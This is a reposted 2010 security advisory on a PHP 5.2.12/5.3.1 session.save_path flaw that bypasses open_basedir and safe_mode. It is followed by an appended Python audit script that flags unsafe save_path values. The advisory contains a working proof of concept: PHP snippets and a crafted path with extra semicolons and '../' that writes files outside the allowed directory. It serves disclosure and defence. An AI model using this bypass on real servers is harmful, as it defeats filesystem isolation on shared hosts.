
[Experience Sharing] PHP 5.2.12 / 5.3.1 safe_mode / open_basedir Bypass


Posted on 2019-1-27 10:45:53
[ PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass ]
  Credit: Grzegorz Stachowiak
  Provided by: SecurityReason.com
  Date:
  - Written: 31.01.2010
  - Public:  11.02.2010
  SecurityRisk: Medium
  Affected Software:
  PHP 5.2.12
  PHP 5.3.1
  Advisory URL: http://securityreason.com/achievement_securityalert/82
  Vendor: http://www.php.net
  --- 0.Description ---
  PHP is an HTML-embedded scripting language. Much of its syntax is
  borrowed from C, Java and Perl with a couple of unique PHP-specific
  features thrown in. The goal of the language is to allow web developers
  to write dynamically generated pages quickly.

  A visitor accessing your web site is assigned a unique id, the so-called
  session id. This is either stored in a cookie on the user side or is
  propagated in the URL.
  session.save_path defines the argument which is passed to the save
  handler. If you choose the default files handler, this is the path where
  the files are created. Defaults to /tmp. See also session_save_path().
  There is an optional N argument to this directive that determines the
  number of directory levels your session files will be spread around in.
  For example, setting to '5;/tmp' may end up creating a session file and
  location like /tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174.
  In order to use N you must create all of these directories before use. A
  small shell script exists in ext/session to do this, it's called
  mod_files.sh. Also note that if N is used and greater than 0 then
  automatic garbage collection will not be performed, see a copy of
  php.ini for further information. Also, if you use N, be sure to surround
  session.save_path in "quotes" because the separator (;) is also used for
  comments in php.ini.
  --- 1. session.save_path safe mode and open basedir bypass ---
  session.save_path can be set via the ini_set() and session_save_path()
  functions. It should contain the path where your temporary session files
  are saved. But the syntax for session.save_path is:
  [/PATH]
  OR
  [N;/PATH]
  N can also be a string (although N should be numeric).
  EXAMPLES:
  1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")
  2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")
  The main problem arises when multiple ';' characters are used together
  with a fake directory structure that is then reduced with '../'.
  Proof of Concept:
  0. Create directories:
  /humhum
  and
  /byp
  1. set open_basedir = /byp
  2. create test.php
  <?php
  session_save_path("/humhum");
  session_start();
  ?>
  3. php test.php
  Warning: session_save_path(): open_basedir restriction in effect.
  File(/humhum) is not within the allowed path(s): (/byp) in /byp/test.php
  on line 3
  4. subdir.php
  <?php
  mkdir("puf");
  mkdir(";a");
  ?>
  5. php subdir.php
  6. cd puf
  7. create byp.php
  <?php
  session_save_path(";;/byp/;a/../../humhum");
  session_start();
  ?>
  8. php byp.php
  9. ls /humhum
  sess_d905eb71c9ad65ce2a845cdb0fed3016
  The root cause is in session.c: PHP does not check whether another ';'
  follows the first one. By creating a fake directory structure
  mkdir ';a'
  mkdir '../;a'
  we can reduce the directory level using '../'.
  --- 2. Fix ---
  Revision 294272
  http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/session/session.c?view=log
  http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/session/session.c?view=log
  --- 3. Credit ---
  Found by: Grzegorz Stachowiak
  Written by: Maksymilian Arciemowicz
  Fixed by  : Ilia Alshanetsky
  --- 4. Contact ---
  Email:
  - Grzegorz.Stachowiak
  stachowiak [a,t} analogicode (d_0t} pl
  - Maksymilian Arciemowicz
  cxib {a.t] securityreason [d0_t} com
  GPG:
  http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
  http://securityreason.com/
  http://securityreason.com/exploit_alert/ - Exploit Database
  http://securityreason.com/security_alert/ - Vulnerability Database
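
An added example, not part of the advisory or of PHP's own code: a host-side audit that checks session.save_path values against the documented [/PATH] and [N;/PATH] forms and flags any absolute suffix that resolves outside the allowed base. The function names, the sample list and the rule of checking every suffix after a ';' are assumptions of this example.

```python
import posixpath

def _inside(resolved, base):
    """True if the normalized path equals base or lies beneath it."""
    base = posixpath.normpath(base)
    return resolved == base or resolved.startswith(base.rstrip("/") + "/")

def audit_save_path(value, allowed_bases):
    """Return findings for one session.save_path value; empty list means clean."""
    findings = []
    n, sep, path = value.partition(";")
    if not sep:                       # plain "/PATH" form, no N field
        path = value
    elif not n.isdigit():
        findings.append("N field is not numeric")
    if ";" in path:
        findings.append("extra ';' after the first separator")
    if not path.startswith("/"):
        findings.append("path is not absolute")
    # Assumption: the audit does not know which ';' a given PHP build splits
    # on, so every absolute suffix following a ';' must stay inside a base.
    starts = [i + 1 for i, ch in enumerate(value) if ch == ";"] or [0]
    for start in starts:
        suffix = value[start:]
        if not suffix.startswith("/"):
            continue
        # Lexical resolution only; on a live host use os.path.realpath()
        # so that symlinks are resolved as well.
        resolved = posixpath.normpath(suffix)
        if not any(_inside(resolved, b) for b in allowed_bases):
            findings.append("%r resolves to %s, outside open_basedir"
                            % (suffix, resolved))
    return findings

# Constructed sample values; the third is the string from the PoC above.
SAMPLES = ["/byp/sessions", "5;/byp/sessions",
           ";;/byp/;a/../../humhum", "/bypass/x"]

def audit_all(values, allowed_bases):
    """Audit several values and map each one to its findings."""
    return {v: audit_save_path(v, allowed_bases) for v in values}

if __name__ == "__main__":
    for value, found in audit_all(SAMPLES, ["/byp"]).items():
        print(value, "->", found or "ok")
```
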

